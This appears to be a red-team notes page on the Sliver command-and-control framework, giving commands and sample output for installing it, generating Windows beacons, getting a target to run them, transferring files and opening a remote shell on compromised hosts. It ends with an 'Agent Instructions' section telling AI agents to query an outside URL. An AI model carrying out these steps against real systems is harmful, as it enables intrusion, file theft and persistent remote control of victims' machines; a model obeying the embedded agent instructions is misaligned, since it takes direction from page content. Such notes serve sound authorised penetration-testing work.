# Sliver

### **Install**

`curl https://sliver.sh/install|sudo bash and then run sliver`

### Install the armory

This will install all the third party post exploitation scripts.

```
sliver > armory install all
```

### Start a listener

```
sliver > https local-ip-address --lhost -D
```

### Generate beacons

This creates an executable that can be launched on the platform of choice.

```
sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable
```

### Execute beacons

Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.

### List beacons

```
sliver > beacons

 ID         Name               Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ================== =========== ========== ================== =============== ===============
 d97fcc0b   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        1h12m2s         1h10m47s      
 7fae33ed   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        43m42s          42m19s        
 d2355aee   UGLIEST_FAMILIAR   http(s)     op2user    linux/amd64        29m59s          28m50s        
 aedc2bbd   UGLIEST_FAMILIAR   http(s)     op3user      linux/amd64        29m44s          28m34s        
 6f3596af   UGLIEST_FAMILIAR   http(s)     root       linux/amd64        38s             36s
```

### Use beacons

In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon one it’s set as your active one. You can now issue commands.

```
sliver > use 6f3596af

[*] Active beacon UGLIEST_FAMILIAR (6f3596af-187d-4b0c-b264-d7482fc6d80b)

sliver (UGLIEST_FAMILIAR) >
```

### Show task list

You can see the status of currently queued and completed tasks issued to a beacon as below:

```
sliver (UGLIEST_FAMILIAR) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 49ead4a9   completed   Ls             Tue, 18 Oct 2022 23:58:08 EDT   Tue, 18 Oct 2022 23:58:52 EDT   Tue, 18 Oct 2022 23:58:52 EDT
```

### Recall task output

You can re-review the output for a task and get more information about it using fetch and the task’s ID number.

```
sliver (UGLIEST_FAMILIAR) > tasks fetch 49ead4a9

+------------------------------------------------------+
| Beacon Task   | 49ead4a9-5859-465f-90e1-1c18ffbcdbdc |
+---------------+--------------------------------------+
| State         | ✅ Completed                         |
| Description   | LsReq                                |
| Created       | Tue, 18 Oct 2022 23:58:08 EDT        |
| Sent          | Tue, 18 Oct 2022 23:58:52 EDT        |
| Completed     | Tue, 18 Oct 2022 23:58:52 EDT        |
| Request Size  | 18 B                                 |
| Response Size | 639 B                                |
+------------------------------------------------------+

/tmp (3 items, 16.1 MiB)
=========================
dtrwxrwxrwx  .font-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .ICE-unix                                                                          <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .Test-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022
```

### Upload/download a file using beacons

```
sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination
[*] Wrote file to /tmp/xxxx.sh

sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/
[*] Wrote file to /tmp/xxxx.sh
```

### Prepare interactive session

```
sliver (UGLIEST_FAMILIAR) > interactive

[*] Using beacon's active C2 endpoint: http://x.x.x.x
[*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a)
[*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDT
```

### List interactive sessions

```
sliver (UGLIEST_FAMILIAR) > sessions

 ID         Transport   Remote Address         Hostname   Username   Operating System   Health  
========== =========== ====================== ========== ========== ================== =========
 13b20a10   http(s)     x.x.x.x:48738   op1    op1user       linux/amd64        [ALIVE]
```

### Switch to interactive sessions

Using the session ID from above, we will use the familiar from meterpreter/metasploit sessions -i. The prompt will change colors to red once this is complete.

```
sliver (UGLIEST_FAMILIAR) > sessions -i 13b20a10

[*] Active session UGLIEST_FAMILIAR (13b20a10)

sliver (UGLIEST_FAMILIAR) >
```

### Switch to full shell

Once in an interactive session, you can drop to a full purpose shell.

```
sliver (UGLIEST_FAMILIAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 29576

op1user@op1:/tmp#
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.awfulsecurity.org/c2/sliver.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.